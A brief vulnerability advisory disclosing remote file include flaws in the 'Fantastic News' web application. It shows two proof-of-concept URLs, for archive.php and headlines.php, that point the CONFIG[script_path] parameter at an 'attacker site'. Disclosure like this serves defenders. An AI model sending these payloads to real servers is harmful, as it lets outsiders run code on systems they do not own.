Fantastic News Multiple Remote File Include Vulnerabilities

Fantastic News Multiple Remote File Include Vulnerabilities

An attacker may exploit these issues using a web client.

The following proof-of-concept script is available:

http://example.com/archive.php?CONFIG[script_path]=attacker site
http://example.com/headlines.php?CONFIG[script_path]=attacker site